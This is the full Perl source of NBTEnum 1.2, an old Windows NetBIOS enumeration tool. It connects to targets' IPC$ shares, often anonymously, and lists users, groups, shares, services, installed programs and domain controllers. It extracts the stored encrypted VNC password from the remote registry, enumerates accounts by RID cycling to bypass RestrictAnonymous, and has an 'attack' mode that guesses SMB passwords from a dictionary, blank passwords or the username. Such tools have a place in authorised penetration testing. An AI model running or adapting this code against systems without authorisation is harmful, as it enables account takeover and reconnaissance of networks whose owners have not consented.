# NBTEnum 1.2 - NetBIOS Enumeration Utility
# Written by NTSleuth - NTSleuth@email.com

use strict;
use Win32::Lanman;
use Win32::Registry;
use Win32;

my($passchecking) = "";
my($dictionary)   = "";
my($username)     = "";
my($password)     = "";
my($ip)           = "";
my(@splitip)      = ();
my($subnet)       = "";
my($x)            = "";

&CheckInput(@ARGV);

if ($ARGV[0] eq "-a")
{
	$passchecking = "TRUE";
	$dictionary   = $ARGV[2];
}
else
{
	$username = $ARGV[2];
	$password = $ARGV[3];
}

if (open(IPRANGE, "< $ARGV[1]"))
{
	while (<IPRANGE>)
	{
		$ip = $_;

		chomp($ip);

			&NBTEnumMain($ip, $passchecking, $dictionary, $username, $password);
	}

	close(IPRANGE);
}
else
{
	$ip = $ARGV[1];

	@splitip = split(/\./, $ip);

	&NBTEnumMain($ip, $passchecking, $dictionary, $username, $password);
}

sub NBTEnumMain()
{
	my($ip, $passchecking, $dictionary, $username, $password) = @_;
	my(@transports)                                           = ();
	my($transport)                                            = "";
	my(@splittransport)                                       = ();
	my($usermodals)                                           = "";
	my(@splitmodals)                                          = ();
	my(@users)                                                = ();
	my($user)                                                 = "";
	my(@splitusers)                                           = ();
	my(@localgroups)                                          = ();
	my($localgroup)                                           = "";
	my(@localusers)                                           = ();
	my($localuser)                                            = "";
	my(@splitlocaluser)                                       = ();
	my($userinfo)                                             = "";
	my(@globalgroups)                                         = ();
	my($x)                                                    = "";
	my($globalgroup)                                          = "";
	my(@globalusers)                                          = ();
	my($globaluser)                                           = "";
	my($guessedpassword)                                      = "";
	my(@guessedpasswords)                                     = ();
	my(@shares)                                               = ();
	my($share)                                                = "";
	my(@osversion)                                            = ();
	my(@services)                                             = ();
	my($service)                                              = "";
	my(@splitservice)                                         = ();
	my(@programs)                                             = ();
	my($program)                                              = "";
	my($dc)                                                   = "";
	my($vncpassword)                                          = "";
	my(@rausers)                                              = ();
	my($rauser)                                               = "";
	my(@splituserpass)                                        = ();

	print "Connecting to host $ip\n";

	if (&Connect($ip, $username, $password))
	{
		OpenLog($ip, $username, $password, $passchecking);

		open(LOG, ">> $ip.html");

		@transports = (&GetWkstaTransports($ip));

		if ($transports[0] ne "FALSE")
		{
			print "-> Getting Workstation Transports\n";

			print LOG qq(<table align="center" width="600" border="1">\n);
			print LOG "<tr>\n";
			print LOG qq(<td valign="top" width="250">\n);
			print LOG qq(<font face="arial" size="2"><b>Network Transports</b>\n);
			print LOG "</td>\n";
			print LOG qq(<td valign="top" width="350">\n);
			print LOG qq(<font face="arial" size="2">);

			foreach $transport (@transports)
			{
				@splittransport = split(/,/, $transport);

				print LOG "<b><i>Transport: </i></b>$splittransport[0]\n";
				print LOG "<br><b><i>MAC Address: </i></b>$splittransport[1]\n";
				print LOG "<br><br>\n";
			}

			print LOG "</td>\n";
			print LOG "</tr>\n";
			print LOG "</table>\n";
			print LOG "\n";

			close(LOG);
		}

		$usermodals = (&GetUserModals($ip));

		if ($usermodals ne "FALSE")
		{
			print "-> Getting Account Lockout Threshold\n";

			open(LOG, ">> $ip.html");

			print LOG "<br>\n";
			print LOG qq(<table align="center" width="600" border="1">\n);
			print LOG "<tr>\n";
			print LOG qq(<td valign="top" width="250">\n);
			print LOG qq(<font face="arial" size="2"><b>NetBIOS Name</b>\n);
			print LOG "</td>\n";
			print LOG qq(<td valign="top" width="350">\n);
			print LOG qq(<font face="arial" size="2">);

			@splitmodals = split(/,/, $usermodals);

			print LOG "$splitmodals[0]\n";

			print LOG "</td>\n";
			print LOG "</tr>\n";
			print LOG "</table>\n";
			print LOG "\n";

			print LOG "<br>\n";
			print LOG qq(<table align="center" width="600" border="1">\n);
			print LOG "<tr>\n";
			print LOG qq(<td valign="top" width="250">\n);
			print LOG qq(<font face="arial" size="2"><b>Account Lockout Threshold</b>\n);
			print LOG "</td>\n";
			print LOG qq(<td valign="top" width="350">\n);
			print LOG qq(<font face="arial" size="2">);

			print LOG "$splitmodals[1] Attempts\n";

			print LOG "</td>\n";
			print LOG "</tr>\n";
			print LOG "</table>\n";
			print LOG "\n";

			close(LOG);

			@users = (&GetWkstaUsers($ip));

			if ($users[0] ne "FALSE")
			{
				print "-> Getting Logged On Users\n";

				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Logged On Users</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $user (@users)
				{
					@splitusers = split(/,/, $user);

					print LOG "<b><i>Username: </i></b>$splitusers[0]\n";
					print LOG "<br><b><i>Logon Server: </i></b>$splitusers[1]\n";
					print LOG "<br><br>";
				}

				print LOG "\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			@localgroups = (&GetLocalGroups($ip));

			if ($localgroups[0] ne "FALSE")
			{
				print "-> Getting Local Groups and Users\n";

				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Local Groups and Users</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $localgroup (@localgroups)
				{
					print LOG "<b><i>$localgroup</i></b>\n";

					@localusers = (&GetLocalUsers($ip, $localgroup));

					if ($localusers[0] ne "FALSE")
					{
						foreach $localuser (@localusers)
						{
							print LOG "<br>- $localuser";

							@splitlocaluser = split(/\\/, $localuser);

							$userinfo = (GetUserInfo($ip, $splitlocaluser[1]));

							if ($userinfo ne "FALSE")
							{
								print LOG qq(<font color="red">$userinfo</font>);
							}

							print LOG "\n";
						}

						print LOG "<br>";
					}

					print LOG "<br>";
				}

				print LOG "\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			@globalgroups = (&GetGlobalGroups($ip));

			if ($globalgroups[0] ne "FALSE")
			{
				print "-> Getting Global Groups and Users\n";

				$x = 0;

				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Global Groups and Users</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $globalgroup (@globalgroups)
				{
					print LOG "<b><i>$globalgroup</i></b>\n";

					@globalusers = (&GetGlobalUsers($ip, $globalgroup));

					if ($globalusers[0] ne "FALSE")
					{
						foreach $globaluser (@globalusers)
						{
							print LOG "<br>- $globaluser";

							$userinfo = (GetUserInfo($ip, $globaluser));

							if ($userinfo ne "FALSE")
							{
								print LOG qq(<font color="red">$userinfo</font>);
							}

							print LOG "\n";

							if ($passchecking eq "TRUE")
							{
								$guessedpassword = (&CheckPasswords($ip, $globaluser, $dictionary, $username, $password));

								if ($guessedpassword ne "")
								{
									$guessedpasswords[$x] = $guessedpassword;

									$x = $x + 1;
								}
							}
						}

						print LOG "<br>";
					}

					print LOG "<br>";
				}

				print LOG "\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			@shares = (&GetShares($ip));

			if ($shares[0] ne "FALSE")
			{
				print "-> Getting Shares\n";

				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Share Information</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $share (@shares)
				{
					print LOG "$share\n";
					print LOG "<br>";
				}

				print LOG "<br>\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			@osversion = (&GetOSVersion($ip));

			if ($osversion[0] ne "FALSE")
			{
				print "-> Getting Extended Information\n";

				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Operating System Information</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				print LOG "<b><i>OS Version: </i></b>Windows NT $osversion[0]<br>\n";
				print LOG "<b><i>Service Pack: </i></b>$osversion[1]\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			@services = (&GetServices($ip));

			if ($services[0] ne "FALSE")
			{
				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Services</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $service (sort @services)
				{
					@splitservice = split(/,/, $service);

					print LOG $splitservice[0];
					print LOG qq(<font color="red"> -$splitservice[1]</font>) if $splitservice[1] eq "Started";
					print LOG "\n";
					print LOG "<br>";
				}

				print LOG "<br>\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			@programs = (&GetInstalledPrograms($ip));

			if ($programs[0] ne "FALSE")
			{
				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Installed Programs</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $program (sort @programs)
				{
					print LOG "$program\n";
					print LOG "<br>";
				}

				print LOG "<br>\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			$dc = (&GetClosestDC($ip));

			if ($dc ne "FALSE")
			{
				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Closest Domain Controller</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				print LOG "$dc\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}

			$vncpassword = (&GetVNCPassword($ip));

			if ($vncpassword ne "FALSE")
			{
				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>Encrypted VNC Password</b>\n);
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				print LOG qq(<font color="red"><b>$vncpassword</font></b><br>\n);

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}
		}
		else
		{
			print "-> Attempting to bypass RestrictAnonymous\n";

			@rausers = (&GetRAUsers($ip));

			if ($rausers[0] ne "FALSE")
			{
				print "-> Getting RIDs 500, 501, and 1000-1500\n";

				open(LOG, ">> $ip.html");

				print LOG "<br>\n";
				print LOG qq(<table align="center" width="600" border="1">\n);
				print LOG "<tr>\n";
				print LOG qq(<td valign="top" width="250">\n);
				print LOG qq(<font face="arial" size="2"><b>RestrictAnonymous Bypass\n);
				print LOG "<br>User RIDs 500, 501, and 1000-1500</b>\n";
				print LOG "</td>\n";
				print LOG qq(<td valign="top" width="350">\n);
				print LOG qq(<font face="arial" size="2">);

				foreach $rauser (@rausers)
				{
					print LOG "$rauser";

					$userinfo = (GetUserInfo($ip, $rauser));

					if ($userinfo ne "FALSE")
					{
						print LOG qq(<font color="red">$userinfo</font>);
					}

					print LOG "\n";
					print LOG "<br>";

					if ($passchecking eq "TRUE")
					{
						$guessedpassword = (&CheckPasswords($ip, $rauser, $dictionary ,$username, $password));

						if ($guessedpassword ne "")
						{
							$guessedpasswords[$x] = $guessedpassword;

							$x = $x + 1;
						}
					}
				}

				print LOG "<br>\n";

				print LOG "</td>\n";
				print LOG "</tr>\n";
				print LOG "</table>\n";
				print LOG "\n";

				close(LOG);
			}
			else
			{
				print "-> Unable to bypass RestrictAnonymous\n";
			}
		}

		if ($guessedpasswords[0] ne "")
		{
			open(LOG, ">> $ip.html");

			print LOG "<br>\n";
			print LOG qq(<table align="center" width="600" border="1">\n);
			print LOG "<tr>\n";
			print LOG qq(<td valign="top" width="250">\n);
			print LOG qq(<font face="arial" size="2"><b>Guessed Passwords</b>\n);
			print LOG "</td>\n";
			print LOG qq(<td valign="top" width="350">\n);
			print LOG qq(<font face="arial" size="2">);

			foreach $guessedpassword (@guessedpasswords)
			{
				@splituserpass = split(/,/, $guessedpassword);

				print LOG qq(<font color="red"><b>$splituserpass[0]</b></font>, password is <font color="red"><b>$splituserpass[1]</b></font>\n);
				print LOG "<br>";
			}

			print LOG "<br>\n";

			print LOG "</td>\n";
			print LOG "</tr>\n";
			print LOG "</table>\n";
			print LOG "\n";

			close(LOG);
		}

		&Disconnect($ip);

		open(LOG, ">> $ip.html");

		print LOG qq(<table align="center" width="600" border="0">\n);
		print LOG "<tr>\n";
		print LOG qq(<td align="center">\n);
		print LOG "<hr>\n";
		print LOG qq(<font face="arial" size="2">Written by NTSleuth - <a href="mailto:ntsleuth\@email.com">NTSleuth\@email.com</a>\n);
		print LOG qq(<br>NBTEnum v1.2  2002 - <a href="http://ntsleuth.0catch.com/">http://ntsleuth.0catch.com/</a>\n);
		print LOG "</td>\n";
		print LOG "</tr>\n";
		print LOG "</table>\n";
		print LOG "</body>\n";
		print LOG "</html>\n";

		close(LOG);
	}
	else
	{
		print "-> Connection failed\n";
	}

	print "\n";
}

sub CheckInput()
{
	my(@ARGV) = @_;

	if ($ARGV[0] =~ /^$/ || $ARGV[4] !~ /^$/)
	{
		print "Usage:\n";
		print "nbtenum [-v]\n";
		print "nbtenum [-h]\n";
		print "nbtenum [-q] [ip address | ip input file] [username] [password]\n";
		print "nbtenum [-a] [ip address | ip input file] [dictionary file]\n";

		exit;
	}

	if ($ARGV[0] !~ /^-q$|^-a$/)
	{
		if ($ARGV[0] =~ /^-v$/ && $ARGV[1] =~ /^$/)
		{
			print "NBTEnum 1.2 - NetBIOS Enumeration Utility\n";
			print "Written by NTSleuth - NTSleuth\@email.com\n";

			exit;
		}
		elsif ($ARGV[0] =~ /^-h$/ && $ARGV[1] =~ /^$/)
		{
			print "-v - (version) Displays version information.\n";
			print "\n";
			print "-h - (help) Displays this screen.\n";
			print "\n";
			print "-q - (query) Enumerates NetBIOS information on the specified host or\n";
			print "     range of IP addresses. If a username and password is not specified\n";
			print "     the utility is run under the context of the null user. If a username\n";
			print "     and password is specified the utility is run under the context of\n";
			print "     the given username.\n";
			print "\n";
			print "-a - (attack) Enumerates NetBIOS information on the specified host or\n";
			print "     range of IP addresses and also performs password checking. If a\n";
			print "     dictionary file is not specified the utility will check for blank\n";
			print "     passwords and passwords the same as the username in lower case.\n";
			print "     If a dictionary file is specified the utility will check each user\n";
			print "     account for all passwords specified in the dictionary file.\n";
			print "\n";
			print "Usage:\n";
			print "nbtenum [-v]\n";
			print "nbtenum [-h]\n";
			print "nbtenum [-q] [ip address | ip input file] [username] [password]\n";
			print "nbtenum [-a] [ip address | ip input file] [dictionary file]\n";

			exit;
		}
		else
		{
			print "Usage:\n";
			print "nbtenum [-v]\n";
			print "nbtenum [-h]\n";
			print "nbtenum [-q] [ip address | ip input file] [username] [password]\n";
			print "nbtenum [-a] [ip address | ip input file] [dictionary file]\n";

			exit;
		}
	}

	if ($ARGV[1] !~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/)
	{
		if (open(IPRANGE, "< $ARGV[1]"))
		{
			close(IPRANGE);
		}
		else
		{
			print "Usage:\n";
			print "nbtenum [-v]\n";
			print "nbtenum [-h]\n";
			print "nbtenum [-q] [ip address | ip input file] [username] [password]\n";
			print "nbtenum [-a] [ip address | ip input file] [dictionary file]\n";

			exit;
		}
	}
}

sub OpenLog()
{
	my($ip, $username, $password, $passchecking) = @_;

	open(LOG, "> $ip.html");

	print LOG "<html>\n";
	print LOG "<head>\n";
	print LOG "<title>NetBIOS Enumeration Utility v1.2</title>\n";
	print LOG "</head>\n";
	print LOG qq(<body background="globe.gif">\n);
	print LOG qq(<table align="center" width="600" border="0">\n);
	print LOG "<tr>\n";
	print LOG "<td>\n";
	print LOG qq(<font face="arial" size="5">\n);
	print LOG "<center>NBTEnum v1.2<br>$ip</center>\n";
	print LOG "<br>\n";

	if ($passchecking eq "TRUE")
	{
		print LOG qq(<font size="2">Password checking is "ON"\n);
	}
	else
	{
		print LOG qq(<font size="2">Password checking is "OFF"\n);
	}

	if ($username eq "")
	{
		print LOG "<br>Running as null user (anonymous)\n";
	}
	else
	{
		if ($password eq "")
		{
			print LOG qq(<br>Running as user "$username", password is blank\n);
		}
		else
		{
			print LOG qq(<br>Running as user "$username", password is "$password"\n);
		}
	}

	print LOG "<br>\n";
	print LOG "<hr>\n";
	print LOG "</td>\n";
	print LOG "</tr>\n";
	print LOG "</table>\n";
	print LOG "\n";

	close(LOG);
}

sub Connect()
{
	my($ip, $username, $password) = @_;
	my(%info)                     = ();

	$info{type}       = &RESOURCETYPE_ANY;
	$info{localname}  = "";
	$info{remotename} = "\\\\$ip\\IPC\$";
	$info{username}   = $username;
	$info{password}   = $password;

	(Win32::Lanman::WNetAddConnection(\%info)) ? (return 1) : (return 0);
}

sub GetWkstaTransports()
{
	my($ip)        = @_;
	my(@info)      = ();
	my($transport) = "";
	my($x)         = "";
	my(@result)    = ();

	if (Win32::Lanman::NetWkstaTransportEnum("\\\\$ip", \@info))
	{
		$x = 0;

		foreach $transport (@info)
		{
			$result[$x] = "${$transport}{'transport_name'},${$transport}{'transport_address'}";

			$x = $x + 1;
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetUserModals()
{
	my($ip)     = @_;
	my(%info)   = ();
	my($result) = "";

	if (Win32::Lanman::NetUserModalsGet("\\\\$ip", \%info))
	{
		$result = "$info{'domain_name'},$info{'lockout_threshold'}";

		return $result;
	}
	else
	{
		$result = "FALSE";

		return $result;
	}
}

sub GetWkstaUsers()
{
	my($ip)     = @_;
	my(@info)   = ();
	my($user)   = "";
	my($x)      = "";
	my(@result) = ();

	if (Win32::Lanman::NetWkstaUserEnum("\\\\$ip", \@info))
	{
		$x = 0;

		foreach $user (@info)
		{
			$result[$x] = "${$user}{'logon_domain'}\\${$user}{'username'},${$user}{'logon_server'}";

			$x = $x + 1;
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetLocalGroups()
{
	my($ip)     = @_;
	my(@groups) = ();
	my($group)  = "";
	my($x)      = "";
	my(@result) = ();

	if (Win32::Lanman::NetLocalGroupEnum("\\\\$ip", \@groups))
	{
		$x = 0;

		foreach $group (@groups)
		{
			$result[$x] = "${$group}{'name'}"; # ${$group}{'comment'}

			$x = $x + 1;
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetLocalUsers()
{
	my($ip, $group)  = @_;
	my(@members)     = ();
	my($member)      = "";
	my(@splitmember) = ();
	my($x)           = "";
	my(@result)      = ();

	if (Win32::Lanman::NetLocalGroupGetMembers("\\\\$ip", $group, \@members))
	{
		$x = 0;

		foreach $member (@members)
		{
			@splitmember = split(/\\/, ${$member}{'domainandname'});

			if ($splitmember[1] ne "")
			{
				$result[$x] = "${$member}{'domainandname'}";

				$x = $x + 1;
			}
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetUserInfo()
{
	my($ip, $user) = @_;
	my(%info)      = ();
	my($lockout)   = "";
	my($disabled)  = "";
	my($result)    = "";

	if (Win32::Lanman::NetUserGetInfo("\\\\$ip", $user, \%info))
	{
		$lockout  = " -Lockout" if ($info{'flags'} & UF_LOCKOUT);
		$disabled = " -Disabled" if ($info{'flags'} & UF_ACCOUNTDISABLE);

		$result = "$lockout$disabled";

		return $result;
	}
	else
	{
		$result = "FALSE";

		return $result;
	}
}

sub GetGlobalGroups()
{
	my($ip)     = @_;
	my(@groups) = ();
	my($group)  = "";
	my($x)      = "";
	my(@result) = ();

	if (Win32::Lanman::NetGroupEnum("\\\\$ip", \@groups))
	{
		$x = 0;

		foreach $group (@groups)
		{
			$result[$x] = "${$group}{'name'}"; # ${$group}{'comment'}

			$x = $x + 1;
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetGlobalUsers()
{
	my($ip, $group) = @_;
	my(@users)      = ();
	my($user)       = "";
	my($x)          = "";
	my(@result)     = ();

	if (Win32::Lanman::NetGroupGetUsers("\\\\$ip", $group, \@users))
	{
		$x = 0;

		foreach $user (@users)
		{
			if (${$user}{'name'} ne "")
			{
				$result[$x] = "${$user}{'name'}";

				$x = $x + 1;
			}
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub CheckPasswords()
{
	my($ip, $username, $dictionary, $ipcusername, $ipcpassword) = @_;
	my($password)                                               = "";
	my($result)                                                 = "";
	my($lcuser)                                                 = "";

	&Disconnect($ip);

	if (open(DICT, "< $dictionary"))
	{
		while (<DICT>)
		{
			$password = $_;

			chomp($password);

			if (&Connect($ip, $username, $password))
			{
				$result = "$username,$password";

				Disconnect($ip);

				last;
			}
		}

		close(DICT);
	}
	else
	{
		if (&Connect($ip, $username, ""))
		{
			$result = "$username,blank";

			Disconnect($ip);
		}

		$lcuser = lc($username);

		if (&Connect($ip, $username, $lcuser))
		{
			$result = "$username,$lcuser";

			Disconnect($ip);
		}
	}

	&Connect($ip, $ipcusername, $ipcpassword);

	return $result;
}

sub GetShares()
{
	my($ip)     = @_;
	my(@shares) = ();
	my($share)  = "";
	my($x)      = "";
	my(@result) = ();

	if (Win32::Lanman::NetShareEnum("\\\\$ip", \@shares))
	{
		$x = 0;

		foreach $share (@shares)
		{
			$result[$x] = "${$share}{'netname'}"; # ${$share}{'remark'}

			$x = $x + 1;
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetOSVersion()
{
	my($ip)             = @_;
	my($HKLM)           = "";
	my($CurrentVersion) = "";
	my($type)           = "";
	my($value)          = "";
	my(@result)         = ();

	if ($HKEY_LOCAL_MACHINE->Win32::Registry::Connect($ip, $HKLM))
	{
		if ($HKLM->Open("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", $CurrentVersion))
		{
			if ($CurrentVersion->QueryValueEx("CurrentVersion", $type, $value))
			{
				$result[0] = $value;
			}

			if ($CurrentVersion->QueryValueEx("CSDVersion", $type, $value))
			{
				$result[1] = $value;
			}
		}
	}

	if ($result[0] eq "")
	{
		$result[0] = "FALSE";
	}

	return @result;
}

sub GetServices()
{
	my($ip)       = @_;
	my(@services) = ();
	my($x)        = "";
	my($service)  = "";
	my(@result)   = ();

	if (Win32::Lanman::EnumServicesStatus("\\\\$ip", "", &SERVICE_WIN32, &SERVICE_STATE_ALL, \@services))
	{
		$x = 0;

		foreach $service (@services)
		{
			if (${$service}{'state'} eq "4")
			{
				$result[$x] = "${$service}{'display'},Started";
			}
			else
			{
				$result[$x] = "${$service}{'display'},Stopped";
			}

			$x = $x + 1;
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub GetInstalledPrograms()
{
	my($ip)          = @_;
	my($HKLM)        = "";
	my($Uninstall)   = "";
	my($x)           = "";
	my(@programs)    = ();
	my($program)     = "";
	my($currentprog) = "";
	my($type)        = "";
	my($value)       = "";
	my(@result)      = ();

	if ($HKEY_LOCAL_MACHINE->Win32::Registry::Connect($ip, $HKLM))
	{
		if ($HKLM->Open("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", $Uninstall))
		{
			$x = 0;

			if ($Uninstall->GetKeys(\@programs))
			{
				foreach $program (@programs)
				{
					$HKLM->Open("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\$program", $currentprog);

					if (!($currentprog->QueryValueEx("SystemComponent", $type, $value)))
					{
						$currentprog->QueryValueEx("DisplayName", $type, $value);

						if ($value ne "")
						{
							$result[$x] = $value;

							$x = $x + 1;
						}

						$value = "";
					}
				}
			}
		}
	}

	if ($result[0] eq "")
	{
		$result[0] = "FALSE";
	}

	return @result;
}

sub GetClosestDC($ip)
{
	my($ip)     = @_;
	my($dc)     = "";
	my($result) = "";

	if (Win32::Lanman::NetGetAnyDCName("\\\\$ip", "", \$dc))
	{
		$result = $dc;

		return $result;
	}
	else
	{
		$result = "FALSE";

		return $result;
	}
}

sub GetVNCPassword()
{
	my($ip)       = @_;
	my($HKLM)     = "";
	my($VNC)      = "";
	my($type)     = "";
	my($value)    = "";
	my(@password) = ();
	my($result)   = "";

	if ($HKEY_LOCAL_MACHINE->Win32::Registry::Connect($ip, $HKLM))
	{
		if ($HKLM->Open("SOFTWARE\\ORL\\WinVNC3\\Default", $VNC))
		{
			if ($VNC->QueryValueEx("Password", $type, $value))
			{
				@password = unpack("H2H2H2H2H2H2H2H2", $value);

				$result = "$password[0] $password[1] $password[2] $password[3] $password[4] $password[5] $password[6] $password[7]";
			}
		}
	}

	if ($result eq "")
	{
		$result = "FALSE";
	}

	return $result;
}

sub GetRAUsers()
{
	my($ip)         = @_;
	my($accountin)  = "";
	my($domain)     = "";
	my($sid)        = "";
	my($sidtype)    = "";
	my($x)          = "";
	my($textsid)    = "";
	my($a)          = "";
	my($b)          = "";
	my($c)          = "";
	my($d)          = "";
	my($e)          = "";
	my($f)          = "";
	my($g)          = "";
	my($h)          = "";
	my($binsid)     = "";
	my($accountout) = "";
	my(@result)     = ();

	$accountin = "Guest";

	if (Win32::LookupAccountName($ip, $accountin, $domain, $sid, $sidtype))
	{
		$x = 0;

		$textsid = (&BinSid2TextSid($sid));

		($a, $b, $c, $d, $e, $f, $g, $h) = split(/\-/, $textsid);

		$binsid = (&TextSid2BinSid("$a-$b-$c-$d-$e-$f-$g-500"));

		$domain  = "";
		$sidtype = "";

		Win32::LookupAccountSID($ip, $binsid, $accountout, $domain, $sidtype);

		if ($accountout ne "")
		{
			$result[$x] = $accountout;

			$x = $x + 1;
		}

		$binsid = (&TextSid2BinSid("$a-$b-$c-$d-$e-$f-$g-501"));

		$domain  = "";
		$sidtype = "";

		Win32::LookupAccountSID($ip, $binsid, $accountout, $domain, $sidtype);

		if ($accountout ne "")
		{
			$result[$x] = $accountout;

			$x = $x + 1;
		}

		for ($h = 1000; $h < 1500; $h++)
		{
			$binsid = (&TextSid2BinSid("$a-$b-$c-$d-$e-$f-$g-$h"));

			$accountout = "";
			$domain     = "";
			$sidtype    = "";

			Win32::LookupAccountSID($ip, $binsid, $accountout, $domain, $sidtype);

			if ($accountout ne "")
			{
				$result[$x] = $accountout;

				$x = $x + 1;
			}
		}

		return @result;
	}
	else
	{
		$result[0] = "FALSE";

		return @result;
	}
}

sub BinSid2TextSid()
{
	my($binsid)                = @_;
	my($Revision)              = "";
	my($SubAuthorityCount)     = "";
	my(@IdentifierAuthorities) = ();
	my($temp1)                 = "";
	my($temp2)                 = "";
	my(@SubAuthorities)        = ();
	my($textsid)               = "";

	($Revision, $SubAuthorityCount, @IdentifierAuthorities) = unpack("CCnnn", $binsid);

	($IdentifierAuthorities[0] || $IdentifierAuthorities[1]) && return;

	($temp1, $temp2, @SubAuthorities) = unpack("VVV$SubAuthorityCount", $binsid);

	$textsid = ("S-$Revision-$IdentifierAuthorities[2]-" . join("-", @SubAuthorities));

	return $textsid;
}

sub TextSid2BinSid()
{
	my($textsid) = @_;
	my(@Values)  = ();
	my($binsid)  = "";

	@Values = split(/\-/, $textsid);

	($Values[0] eq "S") || return;

	$binsid = pack("CCnnnV" . (@Values - 3), $Values[1], @Values - 3, 0, 0, $Values[2], @Values[3 .. (@Values - 1)]);

	return $binsid;
}

sub Disconnect()
{
	my($ip) = @_;

	(Win32::Lanman::WNetCancelConnection("\\\\$ip\\IPC\$", &USE_FORCE)) ? (return 1) : (return 0);
}